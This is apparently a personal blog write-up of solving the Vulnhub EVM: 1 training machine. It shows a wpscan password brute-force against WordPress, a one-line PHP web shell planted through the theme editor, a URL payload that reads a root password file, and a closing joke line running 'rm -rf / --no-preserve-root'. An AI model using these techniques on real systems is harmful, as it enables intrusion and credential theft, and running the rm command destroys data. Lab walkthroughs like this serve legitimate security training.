Vulnhub - EVM: 1 | An ordinary day

Introduction

This is super friendly box intended for Beginner’s
This may work better with VirtualBox than VMware

– note: some of the spelling and punctuation errors on this blog are mine; but if I quoted something (like above), I tend to quote it verbatim, even if I know it’s incorrect.

This box is on the NetSecFocus Admin list of OSCP-like machines. It’s EVM: 1 from vulnhub.

Network Setup

I run my Kali as a VM on a Windows host, in Bridged mode. And that’s how I like it. This machine (and - I’m now realising, some others) don’t like it. It’s set up for Host Only. But if I run Host Only, then Kali can’t see it, unless I reconfigure Kali, which I don’t want to do. Ugh.

Ports

Anyway, this one has SMB, POP3, HTTP, SSH. This won’t be a very detailed writeup; I’m tired and mildly frustrated. Full disclosure; I’m currently roadblocked on two other boxes.

HTTP

The webserver is running wordpress at /wordpress and we can get some creds:

root@kali:/opt/vulnhub/evm# wpscan --url http://192.168.1.105/wordpress --ignore-main-redirect -U 'c0rrupt3d_brain' -P /usr/share/wordlists/rockyou.txt

See the redirect? That’s because I did this in Bridged mode but it keeps trying to go back to the Host Only IP it’s been set up with - 192.168.56.103. Also I ran -e first to get the username. Anyway:

[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - c0rrupt3d_brain / 24992499                                    Trying c0rrupt3d_brain / 24992499 Time: 00:13:05 <                         (10700 / 14355093)  0.07%  ETA: ??:??:??
[!] Valid Combinations Found:
 | Username: c0rrupt3d_brain, Password: 24992499

Using these credentials we should be able to log in to Wordpress, but it just would not in Bridged mode - just constant redirects. Grrr.

Host Only

I switched the VM to Host Only and went over to Windows to see if I could continue without too much bother.

Visiting wp-admin I could log in easily, so that’s a start. I decided to try the theme code editing for once - it worked like a charm and in fact had been set up for this attack. I put

<?php system($_GET['cmd']);?>

into

http://192.168.56.103/wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentynineteen

and had RCE at:

http://192.168.56.103/wordpress/wp-content/themes/twentynineteen/404.php?cmd=

Shell

Lol, no. I’ve got Ubuntu running on WSL (version 1, not the apparently better version 2) with netcat installed but I couldn’t get it to catch a reverse shell and I couldn’t be bothered mucking about too much. Simple manual enumeration was enough:

http://192.168.56.103/wordpress/wp-content/themes/twentynineteen/404.php?cmd=cat%20/home/root3r/.root_password_ssh.txt

willy26

For some reason I couldn’t SSH in from Windows, either from Powershell OR from Ubuntu WSL. F***.

So I just went and put the creds straight into the login on the running VM:

root@ubuntu-extermely-vulnerable-m4ch1ine:~# cd /root/
root@ubuntu-extermely-vulnerable-m4ch1ine:~# cd cat proof.txt
voila you have successfully pwned me :) !!!
:D

I guess that was that. Man, that would have been so much easier without the network issues. I’m assuming there are probably multiple ways to do this box. I might try it again later with a Host Only Kali. But probably not.

In the meantime I’m going to give it one of these:

rm -rf / --no-preserve-root